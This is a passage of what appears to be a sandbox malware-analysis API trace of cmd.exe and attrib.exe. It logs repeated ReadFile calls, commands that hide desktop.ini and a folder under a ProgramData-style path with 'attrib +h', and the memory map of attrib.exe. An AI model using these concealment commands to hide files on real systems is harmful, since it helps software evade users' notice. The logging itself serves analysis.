lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.096] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.096] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.096] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.096] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, 
lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.096] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.097] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.097] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.097] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.097] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.097] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.097] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.097] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.097] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.097] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.097] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.097] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.097] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.098] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.098] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.098] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.098] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.098] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.098] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.098] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.098] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.098] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.098] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.098] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.099] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.099] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.099] ReadFile (in: hFile=0x58, 
lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.099] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.099] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.099] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.099] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.099] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.099] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.099] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.099] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.099] ReadFile 
(in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.100] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.135] FindClose (in: hFindFile=0x3f0698 | out: hFindFile=0x3f0698) returned 1 [0195.135] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0195.135] _close (_FileHandle=3) returned 0 [0195.135] GetConsoleTitleW (in: lpConsoleTitle=0x2af670, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0195.135] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0195.135] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0195.136] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0195.138] FindClose (in: hFindFile=0x3f0698 | out: hFindFile=0x3f0698) returned 1 [0195.138] FindClose (in: hFindFile=0x3f0698 | out: hFindFile=0x3f0698) returned 1 [0195.138] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0195.138] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0195.138] GetConsoleTitleW (in: lpConsoleTitle=0x2af404, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0195.138] InitializeProcThreadAttributeList (in: lpAttributeList=0x2af28c, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2af354 | out: lpAttributeList=0x2af28c, lpSize=0x2af354) returned 1 [0195.138] UpdateProcThreadAttribute (in: lpAttributeList=0x2af28c, dwFlags=0x0, Attribute=0x60001, lpValue=0x2af34c, cbSize=0x4, 
lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2af28c, lpPreviousValue=0x0) returned 1 [0195.139] GetStartupInfoW (in: lpStartupInfo=0x2af248 | out: lpStartupInfo=0x2af248*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0195.139] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0195.139] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~2\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2af2e8*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~2\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2af334 | out: lpCommandLine="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~2\\desktop.ini\" ", lpProcessInformation=0x2af334*(hProcess=0x4c, hThread=0x50, dwProcessId=0xcc0, dwThreadId=0xb70)) returned 1 [0195.140] CloseHandle (hObject=0x50) returned 1 [0195.141] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0195.141] GetEnvironmentStringsW () returned 0x3f2c60* [0195.141] FreeEnvironmentStringsW (penv=0x3f2c60) returned 1 [0195.141] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0195.453] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x2af228 | out: lpExitCode=0x2af228*=0x0) returned 1 [0195.453] CloseHandle (hObject=0x4c) returned 1 
[0195.453] _vsnwprintf (in: _Buffer=0x2af370, _BufferCount=0x13, _Format="%08X", _ArgList=0x2af234 | out: _Buffer="00000000") returned 8 [0195.453] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0195.453] GetEnvironmentStringsW () returned 0x3f2c60* [0195.453] FreeEnvironmentStringsW (penv=0x3f2c60) returned 1 [0195.453] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0195.453] GetEnvironmentStringsW () returned 0x3f2c60* [0195.453] FreeEnvironmentStringsW (penv=0x3f2c60) returned 1 [0195.453] DeleteProcThreadAttributeList (in: lpAttributeList=0x2af28c | out: lpAttributeList=0x2af28c) [0195.453] GetConsoleTitleW (in: lpConsoleTitle=0x2af670, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0195.454] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0195.454] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0195.454] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0195.454] FindClose (in: hFindFile=0x3f0698 | out: hFindFile=0x3f0698) returned 1 [0195.454] FindClose (in: hFindFile=0x3f0698 | out: hFindFile=0x3f0698) returned 1 [0195.454] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0195.454] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0195.454] GetConsoleTitleW (in: lpConsoleTitle=0x2af404, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0195.454] InitializeProcThreadAttributeList (in: lpAttributeList=0x2af28c, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2af354 | out: lpAttributeList=0x2af28c, lpSize=0x2af354) returned 1 [0195.454] UpdateProcThreadAttribute (in: lpAttributeList=0x2af28c, dwFlags=0x0, Attribute=0x60001, 
lpValue=0x2af34c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2af28c, lpPreviousValue=0x0) returned 1 [0195.454] GetStartupInfoW (in: lpStartupInfo=0x2af248 | out: lpStartupInfo=0x2af248*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0195.455] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0195.455] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~2\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2af2e8*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~2\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2af334 | out: lpCommandLine="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~2\"", lpProcessInformation=0x2af334*(hProcess=0x50, hThread=0x4c, dwProcessId=0xb6c, dwThreadId=0xc00)) returned 1 [0195.456] CloseHandle (hObject=0x4c) returned 1 [0195.456] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0195.456] GetEnvironmentStringsW () returned 0x3f3618* [0195.456] FreeEnvironmentStringsW (penv=0x3f3618) returned 1 [0195.456] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0195.542] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x2af228 | out: lpExitCode=0x2af228*=0x0) returned 1 [0195.542] CloseHandle (hObject=0x50) returned 1 [0195.542] 
_vsnwprintf (in: _Buffer=0x2af370, _BufferCount=0x13, _Format="%08X", _ArgList=0x2af234 | out: _Buffer="00000000") returned 8 [0195.542] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0195.542] GetEnvironmentStringsW () returned 0x3f3618* [0195.542] FreeEnvironmentStringsW (penv=0x3f3618) returned 1 [0195.542] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0195.543] GetEnvironmentStringsW () returned 0x3f3618* [0195.543] FreeEnvironmentStringsW (penv=0x3f3618) returned 1 [0195.543] DeleteProcThreadAttributeList (in: lpAttributeList=0x2af28c | out: lpAttributeList=0x2af28c) [0195.543] _get_osfhandle (_FileHandle=1) returned 0x7 [0195.543] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0195.543] _get_osfhandle (_FileHandle=1) returned 0x7 [0195.543] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0195.543] _get_osfhandle (_FileHandle=0) returned 0x3 [0195.543] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0195.543] SetConsoleInputExeNameW () returned 0x1 [0195.543] GetConsoleOutputCP () returned 0x1b5 [0195.543] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0195.543] SetThreadUILanguage (LangId=0x0) returned 0x409 [0195.543] exit (_Code=0) Process: id = "445" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16180" os_pid = "0xb28" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "444" os_parent_pid = "0xacc" cmd_line = "attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~2\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated 
Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 28655 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 28656 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 28657 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 28658 start_va = 0x1f0000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 28659 start_va = 0xcb0000 end_va = 0xcb6fff entry_point = 0xcb0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 28660 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 28661 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 28662 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 28663 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 28664 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 28665 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 
region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 28666 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 28667 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 28668 start_va = 0x1b0000 end_va = 0x1bffff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 28669 start_va = 0x350000 end_va = 0x44ffff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 28670 start_va = 0x6dc00000 end_va = 0x6dc1cfff entry_point = 0x6dc00000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 28671 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 28672 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 28673 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 28674 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 28675 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file 
name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 28676 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 28677 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 28678 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 28679 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 28680 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 28681 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 28682 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 28683 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 28684 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: 
